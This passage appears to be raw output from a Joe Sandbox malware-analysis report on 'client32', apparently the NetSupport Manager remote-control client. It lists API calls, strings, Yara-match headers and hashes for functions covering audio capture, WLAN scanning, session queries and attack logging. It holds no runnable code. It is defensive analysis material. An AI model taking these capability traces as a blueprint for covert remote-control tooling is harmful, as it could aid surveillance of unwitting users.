                                                                              APIs
                                                                              • GetSysColor.USER32(00000004), ref: 11003691
                                                                                • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 110036A5
                                                                              • GetStockObject.GDI32(00000007), ref: 110036B0
                                                                              • SelectObject.GDI32(?,00000000), ref: 110036BB
                                                                              • SelectObject.GDI32(?,?), ref: 110036CC
                                                                              • GetSysColor.USER32(00000010), ref: 110036DC
                                                                              • GetSysColor.USER32(00000010), ref: 110036F3
                                                                              • GetSysColor.USER32(00000014), ref: 1100370A
                                                                              • GetSysColor.USER32(00000014), ref: 11003721
                                                                              • GetSysColor.USER32(00000014), ref: 1100373E
                                                                              • GetSysColor.USER32(00000014), ref: 11003755
                                                                              • GetSysColor.USER32(00000010), ref: 1100376C
                                                                              • GetSysColor.USER32(00000010), ref: 11003783
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
                                                                              • Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
                                                                              • SelectObject.GDI32(?,?), ref: 110037CE
                                                                              • SelectObject.GDI32(?,?), ref: 110037D8
                                                                              • DeleteObject.GDI32(?), ref: 110037DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                              • String ID:
                                                                              • API String ID: 3698065672-0
                                                                              • Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                              • Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
                                                                              • Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                              • Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,EE49F673,?,?), ref: 1104B8F6
                                                                              • _sprintf.LIBCMT ref: 1104B923
                                                                                • Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(00000002,?,00000000,?,00000001,00000003,?,?,?,?,11112835,authcode,?,00000001,authcode,000F003F), ref: 110EDA19
                                                                              • _strncpy.LIBCMT ref: 1104BACE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
                                                                              • String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 3341947355-3231647555
                                                                              • Opcode ID: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
                                                                              • Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
                                                                              • Opcode Fuzzy Hash: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
                                                                              • Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 1104702F
                                                                              • wsprintfA.USER32 ref: 110470AE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • wsprintfA.USER32 ref: 110470E9
                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                              • _strrchr.LIBCMT ref: 1104720C
                                                                              • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                              • _free.LIBCMT ref: 11047251
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                              • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                              • API String ID: 1757445300-1785190265
                                                                              • Opcode ID: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                              • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                              • Opcode Fuzzy Hash: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                              • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • _malloc.LIBCMT ref: 1100B496
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,EE49F673,?,00000000,00000000), ref: 1100AD54
                                                                                • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                              • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,EE49F673,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                              • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                              • _calloc.LIBCMT ref: 1100B519
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                              • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                              • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                              Strings
                                                                              • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                              • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                              • DisableSounds, xrefs: 1100B472
                                                                              • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                              • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                              • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                              • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                              • Audio, xrefs: 1100B477
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                              • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                              • API String ID: 1843377891-2362500394
                                                                              • Opcode ID: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
                                                                              • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
                                                                              • Opcode Fuzzy Hash: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
                                                                              • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
                                                                              APIs
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetLastError.KERNEL32(?), ref: 1102BA81
                                                                              • GetLastError.KERNEL32(?), ref: 1102BADE
                                                                              • _fgets.LIBCMT ref: 1102BB10
                                                                              • _strtok.LIBCMT ref: 1102BB38
                                                                                • Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4
                                                                              • _fgets.LIBCMT ref: 1102BB74
                                                                              • _strtok.LIBCMT ref: 1102BB88
                                                                              Strings
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                              • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 78526175-1484737611
                                                                              • Opcode ID: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                              • Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
                                                                              • Opcode Fuzzy Hash: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                              • Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • LoadLibraryA.KERNEL32(wlanapi.dll,?,?,?,?,11058627), ref: 1115B61B
                                                                              • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 1115B634
                                                                              • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 1115B644
                                                                              • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 1115B654
                                                                              • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 1115B664
                                                                              • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 1115B674
                                                                              • std::exception::exception.LIBCMT ref: 1115B68D
                                                                              • __CxxThrowException@8.LIBCMT ref: 1115B6A2
                                                                              Strings
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                              • API String ID: 2439742961-1736626566
                                                                              • Opcode ID: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                              • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                              • Opcode Fuzzy Hash: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                              • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                              APIs
                                                                                • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                              • _free.LIBCMT ref: 1112131D
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 11121333
                                                                              • _free.LIBCMT ref: 11121348
                                                                              • GdiFlush.GDI32(?,?,?,02CD8E40), ref: 11121350
                                                                              • _free.LIBCMT ref: 1112135D
                                                                              • _free.LIBCMT ref: 11121371
                                                                              • SelectObject.GDI32(?,?), ref: 1112138D
                                                                              • DeleteObject.GDI32(?), ref: 1112139A
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,02CD8E40), ref: 111213A4
                                                                              • DeleteDC.GDI32(?), ref: 111213CB
                                                                              • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                              • DeleteDC.GDI32(?), ref: 111213EB
                                                                              • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                              Strings
                                                                              • Error deleting membm, e=%d, xrefs: 111213AB
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                              • String ID: Error deleting membm, e=%d
                                                                              • API String ID: 3195047866-709490903
                                                                              • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                              • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                              • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                              • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 11053A8A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11041F40: inet_ntoa.WSOCK32(?,?,?,?,110539A4,00000000,?,?,EE49F673,?,?), ref: 11041F52
                                                                              Strings
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
                                                                              • String ID: %s:%u$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
                                                                              • API String ID: 3701541597-1781216912
                                                                              • Opcode ID: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                              • Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
                                                                              • Opcode Fuzzy Hash: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                              • Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                              • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                              • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                              • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                              • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                              Strings
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                              • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                              • API String ID: 4172769820-2231854162
                                                                              • Opcode ID: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                              • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                              • Opcode Fuzzy Hash: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                              • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0000017D,EE49F673,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                              • _memset.LIBCMT ref: 1110F4C2
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                              • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                              • _free.LIBCMT ref: 1110F628
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                              • timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
                                                                              • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,EE49F673,0000017D,00000001), ref: 1110F681
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                              • String ID: End Record %s$PCIR
                                                                              • API String ID: 4278564793-2672865668
                                                                              • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                              • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                              • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                              • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,EE49F673,1102E747,?,00000000), ref: 110F711B
                                                                              • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                              • wsprintfA.USER32 ref: 110F7235
                                                                              • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                              • wsprintfA.USER32 ref: 110F7267
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                              • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                              • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                              • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                              • API String ID: 856016564-3838485836
                                                                              • Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                              • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                              • Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                              • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                              • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                              • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                              • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                              • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                              • GetDC.USER32(?), ref: 11025085
                                                                              • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                              • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                              • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                              • SelectObject.GDI32(?,?), ref: 110250C7
                                                                              • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                              • SetCaretPos.USER32(?,?), ref: 11025111
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                              • String ID:
                                                                              • API String ID: 4100900918-3916222277
                                                                              • Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                              • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                              • Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                              • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 1101F0FE
                                                                              • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                              • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                              • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                              • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                              • _memset.LIBCMT ref: 1101F1CF
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
                                                                              • __strdup.LIBCMT ref: 1101F221
                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                              • String ID: 0$MakeOwnerDraw
                                                                              • API String ID: 1249465458-1190305232
                                                                              • Opcode ID: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                              • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                              • Opcode Fuzzy Hash: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                              • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112B9E6
                                                                              • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112BA03
                                                                              • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
                                                                              • GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
                                                                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
                                                                              • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 1112BAAC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                              • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                              • API String ID: 2449869053-2279908372
                                                                              • Opcode ID: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
                                                                              • Instruction ID: 1bba0573f20789ca060975004b1edadb32616992e73bf794dbb13e42fcf3a639
                                                                              • Opcode Fuzzy Hash: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
                                                                              • Instruction Fuzzy Hash: 5231B371B11228ABEB249F758C55FEEF7B8EF8A315F104199FA09A7280DA705D408F94
                                                                              APIs
                                                                                • Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
                                                                                • Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
                                                                                • Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1
                                                                              • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102384D
                                                                              • ShowWindow.USER32(?,00000003), ref: 110238D1
                                                                              • LoadMenuA.USER32(00000000,000013A3), ref: 110239FB
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 11023A09
                                                                              • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023A29
                                                                              • GetDlgItem.USER32(?,000013B2), ref: 11023A3C
                                                                              • GetWindowRect.USER32(00000000), ref: 11023A43
                                                                              • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023A99
